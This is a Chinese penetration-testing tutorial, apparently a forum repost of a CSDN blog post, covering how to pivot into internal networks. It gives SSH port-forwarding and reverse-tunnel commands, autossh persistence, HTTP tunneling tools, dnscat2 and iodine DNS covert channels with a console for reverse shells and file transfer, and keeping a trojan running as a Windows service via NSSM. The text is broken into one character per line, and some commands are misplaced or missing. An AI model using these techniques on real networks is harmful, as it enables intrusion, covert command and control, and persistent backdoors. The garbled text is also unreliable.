e
b
服
务
器
当
跳
板
,
将
内
网
服
务
器
3
3
8
9
端
口
映
射
到
w
e
b
服
务
器
1
2
3
4
端
口
,
然
后
访
问
1
2
3
4
即
可
访
问
内
网
3
3
8
9
k
a
i
上
执
行
然
后
k
a
l
i
即
可
访
问
3
3
8
9
了
远
程
转
发
将
远
程
主
机
(
服
务
器
)
的
某
个
端
口
转
发
到
本
地
端
指
定
机
器
的
指
定
端
口
场
景
:
k
a
l
i
-
》
防
火
墙
-
》
w
e
b
服
务
器
-
》
内
网
服
务
器
目
的
:
k
a
l
i
访
问
内
网
服
务
器
3
3
8
9
端
口
思
路
:
以
w
e
b
服
务
器
当
跳
板
,
将
k
a
l
i
5
5
5
5
端
口
的
流
量
转
发
到
内
网
服
务
器
3
3
8
9
端
口
,
访
问
5
5
5
5
即
可
访
问
内
网
服
务
器
3
3
8
9
w
e
b
服
务
器
上
执
行
然
后
k
a
l
i
访
问
5
5
5
5
即
可
动
态
转
发
建
立
一
个
s
s
h
加
密
的
s
o
c
k
s
4
/
5
代
理
通
道
,
只
要
支
持
s
o
c
k
s
4
/
5
的
都
可
以
使
用
该
隧
道
通
信
场
景
:
k
a
l
i
-
》
防
火
墙
-
》
w
e
b
服
务
器
-
》
内
网
服
务
器
8
0
w
e
b
服
务
目
的
:
k
a
l
i
通
过
浏
览
器
访
问
内
网
服
务
器
8
0
w
e
b
服
务
思
路
:
在
k
a
l
i
建
立
以
w
e
b
服
务
器
基
础
的
s
o
c
k
e
t
s
5
隧
道
,
然
后
浏
览
器
设
置
s
o
c
k
e
t
s
代
理
,
即
可
访
问
内
网
w
e
b
8
0
w
e
b
服
务
器
k
a
i
上
执
行
s
s
h
反
向
隧
道
简
单
的
来
说
就
是
在
目
标
内
网
机
上
做
到
公
网
服
务
器
的
反
向
代
理
;
然
后
在
公
网
服
务
器
做
正
向
的
代
理
实
现
内
网
到
公
网
的
转
发
目
标
内
网
服
务
器
:
s
s
h
-
f
C
N
R
1
9
2
.
1
6
8
.
1
1
9
.
1
2
9
:
8
8
8
8
:
l
o
c
a
l
h
o
s
t
:
2
2
r
o
o
t
@
1
9
2
.
1
6
8
.
1
1
9
.
1
2
9
#
将
本
机
的
2
2
号
端
口
的
流
量
都
转
发
给
公
网
服
务
器
8
8
8
8
端
口
然
后
公
网
服
务
器
执
行
然
后
即
可
直
接
连
接
公
网
服
务
器
1
1
1
1
端
口
,
即
使
连
接
到
目
标
内
网
服
务
器
。
这
种
方
法
不
稳
定
,
可
以
利
用
A
u
t
o
S
S
H
建
立
稳
定
S
S
H
隧
道
首
先
目
标
内
网
服
务
器
和
公
网
服
务
器
目
标
内
网
服
务
器
生
成
公
钥
私
钥
,
并
到
公
网
服
务
器
中
,
实
现
免
密
登
陆
s
s
h
-
C
f
N
g
-
L
1
2
3
4
:
内
网
i
p
:
3
3
8
9
r
o
o
t
@
w
e
b
服
务
器
s
s
h
-
C
f
N
g
-
R
5
5
5
5
:
内
网
i
p
:
3
3
8
9
r
o
o
t
@
k
a
l
i
i
p
s
s
h
-
C
f
N
g
-
D
1
2
3
4
r
o
o
t
@
w
e
b
服
务
器
i
p
然
后
挂
上
浏
览
器
s
o
c
k
e
t
s
代
理
即
可
访
问
。
s
s
h
-
f
C
N
L
*
:
1
1
1
1
:
l
o
c
a
l
h
o
s
t
:
8
8
8
8
l
o
c
a
l
h
o
s
t
#
、
将
公
网
服
务
器
的
1
1
1
1
端
口
的
流
量
都
转
发
给
服
务
器
的
8
8
8
8
端
口
s
s
h
-
p
1
1
1
1
r
o
o
t
@
公
网
i
p
a
p
t
i
n
s
t
a
l
l
a
u
t
o
s
s
h
s
s
h
-
k
e
y
g
e
n
s
s
h
-
c
o
p
y
-
i
d
r
o
o
t
@
i
p
最
后
执
行
同
理
上
即
可
2
、
H
T
T
P
/
H
T
T
P
S
隧
道
常
见
的
r
e
g
e
o
r
g
、
m
e
t
e
r
p
e
r
t
e
r
、
t
u
n
n
a
等
,
利
用
h
t
t
p
隧
道
进
行
代
理
,
在
爆
破
3
3
8
9
等
比
较
隐
蔽
,
特
征
不
明
显
。
3
、
D
N
S
隧
道
D
N
S
协
议
解
析
过
程
分
为
两
种
,
迭
代
查
询
和
递
归
查
询
(
一
次
请
求
)
,
D
N
S
隧
道
是
隐
蔽
信
道
的
一
种
,
通
过
将
其
他
协
议
封
装
在
D
N
S
协
议
中
进
行
通
信
。
封
装
由
客
户
端
完
成
,
将
D
N
S
流
量
还
原
成
正
常
的
流
量
由
服
务
器
完
成
。
常
用
的
工
具
D
n
s
c
a
t
2
、
i
o
d
i
n
e
、
D
n
s
2
t
c
p
等
D
n
s
c
a
t
2
d
n
s
c
a
t
2
是
一
个
D
N
S
隧
道
工
具
,
通
过
D
N
S
协
议
创
建
加
密
的
命
令
和
控
制
通
道
,
解
析
常
见
的
类
型
:
A
、
C
N
A
M
E
、
M
X
、
T
X
T
…
…
类
型
,
它
的
优
点
就
是
服
务
端
会
有
一
个
命
令
行
控
制
台
,
所
有
的
指
令
都
可
以
在
该
控
制
台
内
完
成
比
如
文
件
上
传
、
下
载
、
反
弹
S
h
e
l
l
,
在
服
务
端
机
器
上
,
执
行
:
服
务
端
客
户
端
连
上
后
,
会
提
示
:
S
e
s
s
i
o
n
e
s
t
a
b
l
i
s
h
e
d
!
服
务
端
的
控
制
台
输
入
:
w
i
n
d
o
w
s
,
即
可
以
看
到
一
个
客
户
端
上
线
:
使
用
w
i
n
d
o
w
-
i
1
,
即
可
进
入
该
通
道
;
常
用
的
有
:
连
接
通
道
后
,
:
i
o
d
i
n
e
i
o
d
i
n
e
这
个
工
具
可
以
大
致
分
为
中
继
和
直
连
两
种
类
型
,
中
继
需
要
在
外
网
有
自
己
的
服
务
器
,
迭
代
请
求
,
直
连
在
客
户
端
直
接
向
指
定
I
P
的
恶
意
D
N
S
服
务
器
发
起
D
N
S
解
析
请
求
,
而
且
传
输
文
件
的
速
度
非
常
快
,
是
一
种
主
流
工
具
。
i
o
d
i
n
e
主
要
分
服
务
端
与
客
户
端
。
当
客
户
端
请
求
该
域
名
的
解
析
,
就
可
以
建
立
通
道
连
接
。
i
o
d
i
n
e
支
持
各
种
系
统
以
及
N
U
L
L
,
T
X
T
,
S
R
V
,
M
X
,
C
N
A
M
E
,
A
等
多
种
查
询
请
求
类
型
。
客
户
端
:
服
务
端
:
-
r
强
制
在
任
何
情
况
下
使
用
D
N
S
隧
道
-
f
将
使
客
户
端
保
持
在
前
台
运
行
-
t
使
用
的
D
N
S
类
型
a
u
t
o
s
s
h
-
M
5
0
0
0
-
N
R
8
8
8
8
:
l
o
c
a
l
h
o
s
t
:
2
2
r
o
o
t
@
x
x
x
.
x
x
x
.
x
x
x
.
x
x
x
-
p
2
2
)
s
u
d
o
r
u
b
y
.
/
d
n
s
c
a
t
2
.
r
b
a
b
c
.
c
o
m
-
-
s
e
c
r
e
t
=
1
2
3
4
5
6
#
1
,
自
定
义
D
N
S
传
输
的
域
名
以
及
密
码
s
u
d
o
r
u
b
y
.
/
d
n
s
c
a
t
2
.
r
b
-
-
d
n
s
s
e
r
v
e
r
=
1
2
7
.
0
.
0
.
1
,
p
o
r
t
=
5
5
5
5
,
t
y
p
e
=
T
X
T
-
-
s
e
c
r
e
t
=
1
2
3
4
5
6
#
2
,
监
听
本
机
5
5
5
5
s
u
d
o
r
u
b
y
.
/
d
n
s
c
a
t
2
.
r
b
a
b
c
.
c
o
m
-
-
s
e
c
r
e
t
=
1
2
3
4
5
6
-
-
s
e
c
u
r
i
t
y
=
o
p
e
n
-
-
n
o
-
c
a
c
h
e
#
方
式
3
客
户
端
d
n
s
c
a
t
-
-
s
e
c
r
e
t
=
1
2
3
4
5
6
a
b
c
.
c
o
m
#
1
d
n
s
c
a
t
-
-
d
n
s
s
e
r
v
e
r
=
d
n
s
c
a
t
2
s
e
r
v
e
r
i
p
>
,
p
o
r
t
=
5
5
5
5
,
t
y
p
e
=
T
X
T
#
2
q
u
i
t
(
退
出
控
制
台
)
k
i
l
l
<
i
d
>
(
中
断
通
道
)
s
e
t
(
设
值
,
比
如
设
置
s
e
c
u
r
i
t
y
=
o
p
e
n
)
w
i
n
d
o
w
s
(
列
举
出
所
有
的
通
道
)
w
i
n
d
o
w
-
i
<
i
d
>
(
连
接
某
个
通
道
)
c
l
e
a
r
(
清
屏
)
d
e
l
a
y
(
修
改
远
程
会
话
超
时
时
间
)
e
x
e
c
(
执
行
远
程
机
上
的
程
序
)
s
h
e
l
l
(
得
到
一
个
反
弹
s
h
e
l
l
)
d
o
w
n
l
o
a
d
/
u
p
l
o
a
d
(
两
端
之
间
上
传
下
载
文
件
)
s
u
p
e
n
d
(
返
回
到
上
一
层
,
等
于
快
捷
键
c
t
r
l
+
z
)
客
户
端
:
s
u
d
o
i
o
d
i
n
e
-
f
-
r
x
x
x
.
c
o
m
-
M
2
0
0
-
P
1
2
3
4
5
6
/
/
x
x
x
.
c
o
m
为
自
定
义
D
N
S
传
输
的
主
域
名
s
u
d
o
i
o
d
i
n
e
-
P
1
2
3
4
5
6
-
f
-
r
-
T
T
X
T
<
d
n
s
服
务
商
,
不
写
就
直
连
>
a
b
c
.
c
o
m
-
M
表
示
最
大
的
上
传
域
名
长
度
维
持
后
门
比
如
利
用
N
S
S
M
,
封
装
某
一
木
马
软
件
e
x
e
封
装
为
系
统
服
务
,
然
后
服
务
器
设
置
自
动
启
动
即
可
。
删
除
利
用
n
s
s
m
r
e
m
o
v
e
余
生
很
长
,
请
多
指
教
。
余
生
很
长
,
请
多
指
教
。
没
有
专
业
运
营
团
队
,
纯
个
人
凭
着
空
闲
时
间
的
学
习
,
通
过
网
络
搜
集
与
学
习
整
理
的
资
料
记
录
并
分
享
。
如
果
觉
得
文
章
对
你
有
帮
助
,
请
支
持
下
点
击
右
下
角
“
在
看
”
版
权
声
明
:
本
文
为
C
S
D
N
博
主
「
S
o
u
l
C
a
t
.
」
的
原
创
文
章
,
遵
循
C
C
4
.
0
B
Y
-
S
A
版
权
协
议
,
转
载
请
附
上
原
文
出
处
链
接
及
本
声
明
。
原
文
链
接
:
h
t
t
p
s
:
/
/
b
l
o
g
.
c
s
d
n
.
n
e
t
/
c
s
a
c
s
/
a
r
t
i
c
l
e
/
d
e
t
a
i
l
s
/
9
0
7
2
3
5
1
3
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试